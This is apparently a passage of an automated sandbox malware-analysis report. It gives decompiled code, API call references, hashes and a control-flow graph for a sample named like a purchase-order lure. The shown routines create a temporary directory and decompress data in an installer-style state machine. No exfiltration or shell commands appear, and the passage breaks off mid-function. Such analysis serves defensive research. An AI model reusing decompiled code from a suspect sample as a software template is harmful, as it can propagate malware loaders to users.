                                                                                      				_v36.Control = 4;
                                                                                      				_v36.Dacl = 0x4083e8;
                                                                                      				_v16.nLength = 0xc;
                                                                                      				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                                                      				if(_t22 != 0) {
                                                                                      					L1:
                                                                                      					return 0;
                                                                                      				}
                                                                                      				_t23 = GetLastError();
                                                                                      				if(_t23 == 0xb7) {
                                                                                      					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                                                      						goto L1;
                                                                                      					}
                                                                                      					return GetLastError();
                                                                                      				}
                                                                                      				return _t23;
                                                                                      			}







                                                                                      0x00405ba4
                                                                                      0x00405ba8
                                                                                      0x00405bab
                                                                                      0x00405bb1
                                                                                      0x00405bb5
                                                                                      0x00405bb9
                                                                                      0x00405bc1
                                                                                      0x00405bc8
                                                                                      0x00405bce
                                                                                      0x00405bd5
                                                                                      0x00405bdc
                                                                                      0x00405be4
                                                                                      0x00405be6
                                                                                      0x00000000
                                                                                      0x00405be6
                                                                                      0x00405bf0
                                                                                      0x00405bf7
                                                                                      0x00405c0d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405c0f
                                                                                      0x00405c13

                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                                      • GetLastError.KERNEL32 ref: 00405BF0
                                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                                                      • GetLastError.KERNEL32 ref: 00405C0F
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 3449924974-3355392842
                                                                                      • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                      • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                                                      • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                      • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 872 406bb0-406bd3 873 406bd5-406bd8 872->873 874 406bdd-406be0 872->874 875 4075fd-407601 873->875 876 406be3-406bec 874->876 877 406bf2 876->877 878 4075fa 876->878 879 406bf9-406bfd 877->879 880 406d39-4073e0 877->880 881 406c9e-406ca2 877->881 882 406d0e-406d12 877->882 878->875 885 406c03-406c10 879->885 886 4075e5-4075f8 879->886 890 4073e2-4073f8 880->890 891 4073fa-407410 880->891 883 406ca8-406cc1 881->883 884 40754e-407558 881->884 887 406d18-406d2c 882->887 888 40755d-407567 882->888 892 406cc4-406cc8 883->892 884->886 885->878 893 406c16-406c5c 885->893 886->875 894 406d2f-406d37 887->894 888->886 895 407413-40741a 890->895 891->895 892->881 896 406cca-406cd0 892->896 897 406c84-406c86 893->897 898 406c5e-406c62 893->898 894->880 894->882 899 407441-40744d 895->899 900 40741c-407420 895->900 901 406cd2-406cd9 896->901 902 406cfa-406d0c 896->902 905 406c94-406c9c 897->905 906 406c88-406c92 897->906 903 406c64-406c67 GlobalFree 898->903 904 406c6d-406c7b GlobalAlloc 898->904 899->876 907 407426-40743e 900->907 908 4075cf-4075d9 900->908 910 406ce4-406cf4 GlobalAlloc 901->910 911 406cdb-406cde GlobalFree 901->911 902->894 903->904 904->878 912 406c81 904->912 905->892 906->905 906->906 907->899 908->886 910->878 910->902 911->910 912->897
                                                                                      C-Code - Quality: 98%
                                                                                      			E00406BB0(void* __ecx) {
                                                                                      				void* _v8;
                                                                                      				void* _v12;
                                                                                      				signed int _v16;
                                                                                      				unsigned int _v20;
                                                                                      				signed int _v24;
                                                                                      				signed int _v28;
                                                                                      				signed int _v32;
                                                                                      				signed int _v36;
                                                                                      				signed int _v40;
                                                                                      				signed int _v44;
                                                                                      				signed int _v48;
                                                                                      				signed int _v52;
                                                                                      				signed int _v56;
                                                                                      				signed int _v60;
                                                                                      				signed int _v64;
                                                                                      				signed int _v68;
                                                                                      				signed int _v72;
                                                                                      				signed int _v76;
                                                                                      				signed int _v80;
                                                                                      				signed int _v84;
                                                                                      				signed int _v88;
                                                                                      				signed int _v92;
                                                                                      				signed int _v95;
                                                                                      				signed int _v96;
                                                                                      				signed int _v100;
                                                                                      				signed int _v104;
                                                                                      				signed int _v108;
                                                                                      				signed int _v112;
                                                                                      				signed int _v116;
                                                                                      				signed int _v120;
                                                                                      				intOrPtr _v124;
                                                                                      				signed int _v128;
                                                                                      				signed int _v132;
                                                                                      				signed int _v136;
                                                                                      				void _v140;
                                                                                      				void* _v148;
                                                                                      				signed int _t537;
                                                                                      				signed int _t538;
                                                                                      				signed int _t572;
                                                                                      
                                                                                      				_t572 = 0x22;
                                                                                      				_v148 = __ecx;
                                                                                      				memcpy( &_v140, __ecx, _t572 << 2);
                                                                                      				if(_v52 == 0xffffffff) {
                                                                                      					return 1;
                                                                                      				}
                                                                                      				while(1) {
                                                                                      					L3:
                                                                                      					_t537 = _v140;
                                                                                      					if(_t537 > 0x1c) {
                                                                                      						break;
                                                                                      					}
                                                                                      					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
                                                                                      						case 0:
                                                                                      							__eflags = _v112;
                                                                                      							if(_v112 == 0) {
                                                                                      								goto L173;
                                                                                      							}
                                                                                      							_v112 = _v112 - 1;
                                                                                      							_v116 = _v116 + 1;
                                                                                      							_t537 =  *_v116;
                                                                                      							__eflags = _t537 - 0xe1;
                                                                                      							if(_t537 > 0xe1) {
                                                                                      								goto L174;
                                                                                      							}
                                                                                      							_t542 = _t537 & 0x000000ff;
                                                                                      							_push(0x2d);
                                                                                      							asm("cdq");
                                                                                      							_pop(_t576);
                                                                                      							_push(9);
                                                                                      							_pop(_t577);
                                                                                      							_t622 = _t542 / _t576;
                                                                                      							_t544 = _t542 % _t576 & 0x000000ff;
                                                                                      							asm("cdq");
                                                                                      							_t617 = _t544 % _t577 & 0x000000ff;
                                                                                      							_v64 = _t617;
                                                                                      							_v32 = (1 << _t622) - 1;
                                                                                      							_v28 = (1 << _t544 / _t577) - 1;
                                                                                      							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                                                      							__eflags = 0x600 - _v124;
                                                                                      							if(0x600 == _v124) {
                                                                                      								L12:
                                                                                      								__eflags = _t625;
                                                                                      								if(_t625 == 0) {
                                                                                      									L14:
                                                                                      									_v76 = _v76 & 0x00000000;
                                                                                      									_v68 = _v68 & 0x00000000;
                                                                                      									goto L17;
                                                                                      								} else {
                                                                                      									goto L13;
                                                                                      								}
                                                                                      								do {
                                                                                      									L13:
                                                                                      									_t625 = _t625 - 1;
                                                                                      									__eflags = _t625;
                                                                                      									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                                                      								} while (_t625 != 0);
                                                                                      								goto L14;
                                                                                      							}
                                                                                      							__eflags = _v8;
                                                                                      							if(_v8 != 0) {
                                                                                      								GlobalFree(_v8);
                                                                                      							}
                                                                                      							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                                                      							__eflags = _t537;
                                                                                      							_v8 = _t537;
                                                                                      							if(_t537 == 0) {
                                                                                      								goto L174;
                                                                                      							} else {
                                                                                      								_v124 = 0x600;
                                                                                      								goto L12;
                                                                                      							}
                                                                                      						case 1:
                                                                                      							L15:
                                                                                      							__eflags = _v112;
                                                                                      							if(_v112 == 0) {
                                                                                      								_v140 = 1;
                                                                                      								goto L173;
                                                                                      							}
                                                                                      							_v112 = _v112 - 1;
                                                                                      							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                                                      							_v116 = _v116 + 1;
                                                                                      							_t50 =  &_v76;
                                                                                      							 *_t50 = _v76 + 1;
                                                                                      							__eflags =  *_t50;
                                                                                      							L17:
                                                                                      							__eflags = _v76 - 4;
                                                                                      							if(_v76 < 4) {
                                                                                      								goto L15;
                                                                                      							}
                                                                                      							_t550 = _v68;
                                                                                      							__eflags = _t550 - _v120;
                                                                                      							if(_t550 == _v120) {
                                                                                      								L22:
                                                                                      								_v76 = 5;
                                                                                      								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                                                      								goto L25;
                                                                                      							}
                                                                                      							__eflags = _v12;
                                                                                      							_v120 = _t550;
                                                                                      							if(_v12 != 0) {
                                                                                      								GlobalFree(_v12);
                                                                                      							}
                                                                                      							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                                                      							__eflags = _t537;
                                                                                      							_v12 = _t537;
                                                                                      							if(_t537 == 0) {
                                                                                      								goto L174;
                                                                                      							} else {
                                                                                      								goto L22;
                                                                                      							}
                                                                                      						case 2:
                                                                                      							L26:
                                                                                      							_t557 = _v100 & _v32;
                                                                                      							_v136 = 6;
                                                                                      							_v80 = _t557;
                                                                                      							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                                                      							goto L135;
                                                                                      						case 3:
                                                                                      							L23:
                                                                                      							__eflags = _v112;
                                                                                      							if(_v112 == 0) {
                                                                                      								_v140 = 3;
                                                                                      								goto L173;
                                                                                      							}
                                                                                      							_v112 = _v112 - 1;
                                                                                      							_t72 =  &_v116;
                                                                                      							 *_t72 = _v116 + 1;
                                                                                      							__eflags =  *_t72;
                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                      							L25:
                                                                                      							_v76 = _v76 - 1;
                                                                                      							__eflags = _v76;
                                                                                      							if(_v76 != 0) {
                                                                                      								goto L23;
                                                                                      							}
                                                                                      							goto L26;
                                                                                      						case 4:
                                                                                      							L136:
                                                                                      							_t559 =  *_t626;
                                                                                      							_t610 = _t559 & 0x0000ffff;
                                                                                      							_t591 = (_v20 >> 0xb) * _t610;
                                                                                      							__eflags = _v16 - _t591;
                                                                                      							if(_v16 >= _t591) {
                                                                                      								_v20 = _v20 - _t591;
                                                                                      								_v16 = _v16 - _t591;
                                                                                      								_v68 = 1;
                                                                                      								_t560 = _t559 - (_t559 >> 5);
                                                                                      								__eflags = _t560;
                                                                                      								 *_t626 = _t560;
                                                                                      							} else {
                                                                                      								_v20 = _t591;
                                                                                      								_v68 = _v68 & 0x00000000;
                                                                                      								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                                                      							}
                                                                                      							__eflags = _v20 - 0x1000000;
                                                                                      							if(_v20 >= 0x1000000) {
                                                                                      								goto L142;
                                                                                      							} else {
                                                                                      								goto L140;
                                                                                      							}
                                                                                      						case 5:
                                                                                      							L140:
                                                                                      							__eflags = _v112;
                                                                                      							if(_v112 == 0) {
                                                                                      								_v140 = 5;
                                                                                      								goto L173;
                                                                                      							}
                                                                                      							_v20 = _v20 << 8;
                                                                                      							_v112 = _v112 - 1;
                                                                                      							_t464 =  &_v116;
                                                                                      							 *_t464 = _v116 + 1;
                                                                                      							__eflags =  *_t464;
                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                      							L142:
                                                                                      							_t561 = _v136;
                                                                                      							goto L143;
                                                                                      						case 6:
                                                                                      							__edx = 0;
                                                                                      							__eflags = _v68;
                                                                                      							if(_v68 != 0) {
                                                                                      								__eax = _v8;
                                                                                      								__ecx = _v60;
                                                                                      								_v56 = 1;
                                                                                      								_v136 = 7;
                                                                                      								__esi = _v8 + 0x180 + _v60 * 2;
                                                                                      								goto L135;
                                                                                      							}
                                                                                      							__eax = _v96 & 0x000000ff;
                                                                                      							__esi = _v100;
                                                                                      							__cl = 8;
                                                                                      							__cl = 8 - _v64;
                                                                                      							__esi = _v100 & _v28;
                                                                                      							__eax = (_v96 & 0x000000ff) >> 8;
                                                                                      							__ecx = _v64;
                                                                                      							__esi = (_v100 & _v28) << 8;
                                                                                      							__ecx = _v8;
                                                                                      							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                                                                      							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                                                                      							__eflags = _v60 - 4;
                                                                                      							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                                      							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                                      							if(_v60 >= 4) {
                                                                                      								__eflags = _v60 - 0xa;
                                                                                      								if(_v60 >= 0xa) {
                                                                                      									_t103 =  &_v60;
                                                                                      									 *_t103 = _v60 - 6;
                                                                                      									__eflags =  *_t103;
                                                                                      								} else {
                                                                                      									_v60 = _v60 - 3;
                                                                                      								}
                                                                                      							} else {
                                                                                      								_v60 = 0;
                                                                                      							}
                                                                                      							__eflags = _v56 - __edx;
                                                                                      							if(_v56 == __edx) {
                                                                                      								__ebx = 0;
                                                                                      								__ebx = 1;
                                                                                      								goto L63;
                                                                                      							}
                                                                                      							__eax = _v24;
                                                                                      							__eax = _v24 - _v48;
                                                                                      							__eflags = __eax - _v120;
                                                                                      							if(__eax >= _v120) {
                                                                                      								__eax = __eax + _v120;
                                                                                      								__eflags = __eax;
                                                                                      							}
                                                                                      							__ecx = _v12;
                                                                                      							__ebx = 0;
                                                                                      							__ebx = 1;
                                                                                      							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                      							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                                                                      							goto L43;
                                                                                      						case 7:
                                                                                      							__eflags = _v68 - 1;
                                                                                      							if(_v68 != 1) {
                                                                                      								__eax = _v40;
                                                                                      								_v132 = 0x16;
                                                                                      								_v36 = _v40;
                                                                                      								__eax = _v44;
                                                                                      								_v40 = _v44;
                                                                                      								__eax = _v48;
                                                                                      								_v44 = _v48;
                                                                                      								__eax = 0;
                                                                                      								__eflags = _v60 - 7;
                                                                                      								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                      								__al = __al & 0x000000fd;
                                                                                      								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                      								_v60 = (__eflags >= 0) - 1 + 0xa;
                                                                                      								__eax = _v8;
                                                                                      								__eax = _v8 + 0x664;
                                                                                      								__eflags = __eax;
                                                                                      								_v92 = __eax;
                                                                                      								goto L71;
                                                                                      							}
                                                                                      							__eax = _v8;
                                                                                      							__ecx = _v60;
                                                                                      							_v136 = 8;
                                                                                      							__esi = _v8 + 0x198 + _v60 * 2;
                                                                                      							goto L135;
                                                                                      						case 8:
                                                                                      							__eflags = _v68;
                                                                                      							if(_v68 != 0) {
                                                                                      								__eax = _v8;
                                                                                      								__ecx = _v60;
                                                                                      								_v136 = 0xa;
                                                                                      								__esi = _v8 + 0x1b0 + _v60 * 2;
                                                                                      							} else {
                                                                                      								__eax = _v60;
                                                                                      								__ecx = _v8;
                                                                                      								__eax = _v60 + 0xf;
                                                                                      								_v136 = 9;
                                                                                      								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                                                                      								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                                                                      							}
                                                                                      							goto L135;
                                                                                      						case 9:
                                                                                      							__eflags = _v68;
                                                                                      							if(_v68 != 0) {
                                                                                      								goto L92;
                                                                                      							}
                                                                                      							__eflags = _v100;
                                                                                      							if(_v100 == 0) {
                                                                                      								goto L174;
                                                                                      							}
                                                                                      							__eax = 0;
                                                                                      							__eflags = _v60 - 7;
                                                                                      							_t264 = _v60 - 7 >= 0;
                                                                                      							__eflags = _t264;
                                                                                      							0 | _t264 = _t264 + _t264 + 9;
                                                                                      							_v60 = _t264 + _t264 + 9;
                                                                                      							goto L78;
                                                                                      						case 0xa:
                                                                                      							__eflags = _v68;
                                                                                      							if(_v68 != 0) {
                                                                                      								__eax = _v8;
                                                                                      								__ecx = _v60;
                                                                                      								_v136 = 0xb;
                                                                                      								__esi = _v8 + 0x1c8 + _v60 * 2;
                                                                                      								goto L135;
                                                                                      							}
                                                                                      							__eax = _v44;
                                                                                      							goto L91;
                                                                                      						case 0xb:
                                                                                      							__eflags = _v68;
                                                                                      							if(_v68 != 0) {
                                                                                      								__ecx = _v40;
                                                                                      								__eax = _v36;
                                                                                      								_v36 = _v40;
                                                                                      							} else {
                                                                                      								__eax = _v40;
                                                                                      							}
                                                                                      							__ecx = _v44;
                                                                                      							_v40 = _v44;
                                                                                      							L91:
                                                                                      							__ecx = _v48;
                                                                                      							_v48 = __eax;
                                                                                      							_v44 = _v48;
                                                                                      							L92:
                                                                                      							__eax = _v8;
                                                                                      							_v132 = 0x15;
                                                                                      							__eax = _v8 + 0xa68;
                                                                                      							_v92 = _v8 + 0xa68;
                                                                                      							goto L71;
                                                                                      						case 0xc:
                                                                                      							L102:
                                                                                      							__eflags = _v112;
                                                                                      							if(_v112 == 0) {
                                                                                      								_v140 = 0xc;
                                                                                      								goto L173;
                                                                                      							}
                                                                                      							__ecx = _v116;
                                                                                      							__eax = _v16;
                                                                                      							_v20 = _v20 << 8;
                                                                                      							__ecx =  *_v116 & 0x000000ff;
                                                                                      							_v112 = _v112 - 1;
                                                                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                      							_t340 =  &_v116;
                                                                                      							 *_t340 = _v116 + 1;
                                                                                      							__eflags =  *_t340;
                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                      							__eax = _v48;
                                                                                      							goto L104;
                                                                                      						case 0xd:
                                                                                      							L39:
                                                                                      							__eflags = _v112;
                                                                                      							if(_v112 == 0) {
                                                                                      								_v140 = 0xd;
                                                                                      								goto L173;
                                                                                      							}
                                                                                      							__ecx = _v116;
                                                                                      							__eax = _v16;
                                                                                      							_v20 = _v20 << 8;
                                                                                      							__ecx =  *_v116 & 0x000000ff;
                                                                                      							_v112 = _v112 - 1;
                                                                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                      							_t127 =  &_v116;
                                                                                      							 *_t127 = _v116 + 1;
                                                                                      							__eflags =  *_t127;
                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                      							L41:
                                                                                      							__eax = _v68;
                                                                                      							__eflags = _v76 - _v68;
                                                                                      							if(_v76 != _v68) {
                                                                                      								goto L50;
                                                                                      							}
                                                                                      							__eflags = __ebx - 0x100;
                                                                                      							if(__ebx >= 0x100) {
                                                                                      								goto L56;
                                                                                      							}
                                                                                      							L43:
                                                                                      							__eax = _v95 & 0x000000ff;
                                                                                      							_v95 = _v95 << 1;
                                                                                      							__ecx = _v92;
                                                                                      							__eax = (_v95 & 0x000000ff) >> 7;
                                                                                      							_v76 = __eax;
                                                                                      							__eax = __eax + 1;
                                                                                      							__eax = __eax << 8;
                                                                                      							__eax = __eax + __ebx;
                                                                                      							__esi = _v92 + __eax * 2;
                                                                                      							_v20 = _v20 >> 0xb;
                                                                                      							__ax =  *__esi;
                                                                                      							_v88 = __esi;
                                                                                      							__edx = __ax & 0x0000ffff;
                                                                                      							__ecx = (_v20 >> 0xb) * __edx;
                                                                                      							__eflags = _v16 - __ecx;
                                                                                      							if(_v16 >= __ecx) {
                                                                                      								_v20 = _v20 - __ecx;
                                                                                      								_v16 = _v16 - __ecx;
                                                                                      								__cx = __ax;
                                                                                      								_v68 = 1;
                                                                                      								__cx = __ax >> 5;
                                                                                      								__eflags = __eax;
                                                                                      								__ebx = __ebx + __ebx + 1;
                                                                                      								 *__esi = __ax;
                                                                                      							} else {
                                                                                      								_v68 = _v68 & 0x00000000;
                                                                                      								_v20 = __ecx;
                                                                                      								0x800 = 0x800 - __edx;
                                                                                      								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                      								__ebx = __ebx + __ebx;
                                                                                      								 *__esi = __cx;
                                                                                      							}
                                                                                      							__eflags = _v20 - 0x1000000;
                                                                                      							_v72 = __ebx;
                                                                                      							if(_v20 >= 0x1000000) {
                                                                                      								goto L41;
                                                                                      							} else {
                                                                                      								goto L39;
                                                                                      							}
                                                                                      						case 0xe:
                                                                                      							L48:
                                                                                      							__eflags = _v112;
                                                                                      							if(_v112 == 0) {
                                                                                      								_v140 = 0xe;
                                                                                      								goto L173;
                                                                                      							}
                                                                                      							__ecx = _v116;
                                                                                      							__eax = _v16;
                                                                                      							_v20 = _v20 << 8;
                                                                                      							__ecx =  *_v116 & 0x000000ff;
                                                                                      							_v112 = _v112 - 1;
                                                                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                      							_t161 =  &_v116;
                                                                                      							 *_t161 = _v116 + 1;
                                                                                      							__eflags =  *_t161;
                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                      							while(1) {
                                                                                      								L50:
                                                                                      								__eflags = __ebx - 0x100;
                                                                                      								if(__ebx >= 0x100) {
                                                                                      									break;
                                                                                      								}
                                                                                      								__eax = _v92;
                                                                                      								__edx = __ebx + __ebx;
                                                                                      								__ecx = _v20;
                                                                                      								__esi = __edx + __eax;
                                                                                      								__ecx = _v20 >> 0xb;
                                                                                      								__ax =  *__esi;
                                                                                      								_v88 = __esi;
                                                                                      								__edi = __ax & 0x0000ffff;
                                                                                      								__ecx = (_v20 >> 0xb) * __edi;
                                                                                      								__eflags = _v16 - __ecx;
                                                                                      								if(_v16 >= __ecx) {
                                                                                      									_v20 = _v20 - __ecx;
                                                                                      									_v16 = _v16 - __ecx;
                                                                                      									__cx = __ax;
                                                                                      									_t175 = __edx + 1; // 0x1
                                                                                      									__ebx = _t175;
                                                                                      									__cx = __ax >> 5;
                                                                                      									__eflags = __eax;
                                                                                      									 *__esi = __ax;
                                                                                      								} else {
                                                                                      									_v20 = __ecx;
                                                                                      									0x800 = 0x800 - __edi;
                                                                                      									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      									__ebx = __ebx + __ebx;
                                                                                      									 *__esi = __cx;
                                                                                      								}
                                                                                      								__eflags = _v20 - 0x1000000;
                                                                                      								_v72 = __ebx;
                                                                                      								if(_v20 >= 0x1000000) {
                                                                                      									continue;
                                                                                      								} else {
                                                                                      									goto L48;
                                                                                      								}
                                                                                      							}
                                                                                      							L56:
                                                                                      							_t178 =  &_v56;
                                                                                      							 *_t178 = _v56 & 0x00000000;
                                                                                      							__eflags =  *_t178;
                                                                                      							goto L57;
                                                                                      						case 0xf:
                                                                                      							L60:
                                                                                      							__eflags = _v112;
                                                                                      							if(_v112 == 0) {
                                                                                      								_v140 = 0xf;
                                                                                      								goto L173;
                                                                                      							}
                                                                                      							__ecx = _v116;
                                                                                      							__eax = _v16;
                                                                                      							_v20 = _v20 << 8;
                                                                                      							__ecx =  *_v116 & 0x000000ff;
                                                                                      							_v112 = _v112 - 1;
                                                                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                      							_t208 =  &_v116;
                                                                                      							 *_t208 = _v116 + 1;
                                                                                      							__eflags =  *_t208;
                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                      							L62:
                                                                                      							__eflags = __ebx - 0x100;
                                                                                      							if(__ebx >= 0x100) {
                                                                                      								L57:
                                                                                      								__al = _v72;
                                                                                      								_v96 = _v72;
                                                                                      								goto L58;
                                                                                      							}
                                                                                      							L63:
                                                                                      							__eax = _v92;
                                                                                      							__edx = __ebx + __ebx;
                                                                                      							__ecx = _v20;
                                                                                      							__esi = __edx + __eax;
                                                                                      							__ecx = _v20 >> 0xb;
                                                                                      							__ax =  *__esi;
                                                                                      							_v88 = __esi;
                                                                                      							__edi = __ax & 0x0000ffff;
                                                                                      							__ecx = (_v20 >> 0xb) * __edi;
                                                                                      							__eflags = _v16 - __ecx;
                                                                                      							if(_v16 >= __ecx) {
                                                                                      								_v20 = _v20 - __ecx;
                                                                                      								_v16 = _v16 - __ecx;
                                                                                      								__cx = __ax;
                                                                                      								_t222 = __edx + 1; // 0x1
                                                                                      								__ebx = _t222;
                                                                                      								__cx = __ax >> 5;
                                                                                      								__eflags = __eax;
                                                                                      								 *__esi = __ax;
                                                                                      							} else {
                                                                                      								_v20 = __ecx;
                                                                                      								0x800 = 0x800 - __edi;
                                                                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      								__ebx = __ebx + __ebx;
                                                                                      								 *__esi = __cx;
                                                                                      							}
                                                                                      							__eflags = _v20 - 0x1000000;
                                                                                      							_v72 = __ebx;
                                                                                      							if(_v20 >= 0x1000000) {
                                                                                      								goto L62;
                                                                                      							} else {
                                                                                      								goto L60;
                                                                                      							}
                                                                                      						case 0x10:
                                                                                      							L112:
                                                                                      							__eflags = _v112;
                                                                                      							if(_v112 == 0) {
                                                                                      								_v140 = 0x10;
                                                                                      								goto L173;
                                                                                      							}
                                                                                      							__ecx = _v116;
                                                                                      							__eax = _v16;
                                                                                      							_v20 = _v20 << 8;
                                                                                      							__ecx =  *_v116 & 0x000000ff;
                                                                                      							_v112 = _v112 - 1;
                                                                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                      							_t371 =  &_v116;
                                                                                      							 *_t371 = _v116 + 1;
                                                                                      							__eflags =  *_t371;
                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                      							goto L114;
                                                                                      						case 0x11:
                                                                                      							L71:
                                                                                      							__esi = _v92;
                                                                                      							_v136 = 0x12;
                                                                                      							goto L135;
                                                                                      						case 0x12:
                                                                                      							__eflags = _v68;
                                                                                      							if(_v68 != 0) {
                                                                                      								__eax = _v92;
                                                                                      								_v136 = 0x13;
                                                                                      								__esi = _v92 + 2;
                                                                                      								L135:
                                                                                      								_v88 = _t626;
                                                                                      								goto L136;
                                                                                      							}
                                                                                      							__eax = _v80;
                                                                                      							_v52 = _v52 & 0x00000000;
                                                                                      							__ecx = _v92;
                                                                                      							__eax = _v80 << 4;
                                                                                      							__eflags = __eax;
                                                                                      							__eax = _v92 + __eax + 4;
                                                                                      							goto L133;
                                                                                      						case 0x13:
                                                                                      							__eflags = _v68;
                                                                                      							if(_v68 != 0) {
                                                                                      								_t475 =  &_v92;
                                                                                      								 *_t475 = _v92 + 0x204;
                                                                                      								__eflags =  *_t475;
                                                                                      								_v52 = 0x10;
                                                                                      								_v68 = 8;
                                                                                      								L147:
                                                                                      								_v128 = 0x14;
                                                                                      								goto L148;
                                                                                      							}
                                                                                      							__eax = _v80;
                                                                                      							__ecx = _v92;
                                                                                      							__eax = _v80 << 4;
                                                                                      							_v52 = 8;
                                                                                      							__eax = _v92 + (_v80 << 4) + 0x104;
                                                                                      							L133:
                                                                                      							_v92 = __eax;
                                                                                      							_v68 = 3;
                                                                                      							goto L147;
                                                                                      						case 0x14:
                                                                                      							_v52 = _v52 + __ebx;
                                                                                      							__eax = _v132;
                                                                                      							goto L143;
                                                                                      						case 0x15:
                                                                                      							__eax = 0;
                                                                                      							__eflags = _v60 - 7;
                                                                                      							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                      							__al = __al & 0x000000fd;
                                                                                      							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                      							_v60 = (__eflags >= 0) - 1 + 0xb;
                                                                                      							goto L123;
                                                                                      						case 0x16:
                                                                                      							__eax = _v52;
                                                                                      							__eflags = __eax - 4;
                                                                                      							if(__eax >= 4) {
                                                                                      								_push(3);
                                                                                      								_pop(__eax);
                                                                                      							}
                                                                                      							__ecx = _v8;
                                                                                      							_v68 = 6;
                                                                                      							__eax = __eax << 7;
                                                                                      							_v128 = 0x19;
                                                                                      							_v92 = __eax;
                                                                                      							goto L148;
                                                                                      						case 0x17:
                                                                                      							L148:
                                                                                      							__eax = _v68;
                                                                                      							_v84 = 1;
                                                                                      							_v76 = _v68;
                                                                                      							goto L152;
                                                                                      						case 0x18:
                                                                                      							L149:
                                                                                      							__eflags = _v112;
                                                                                      							if(_v112 == 0) {
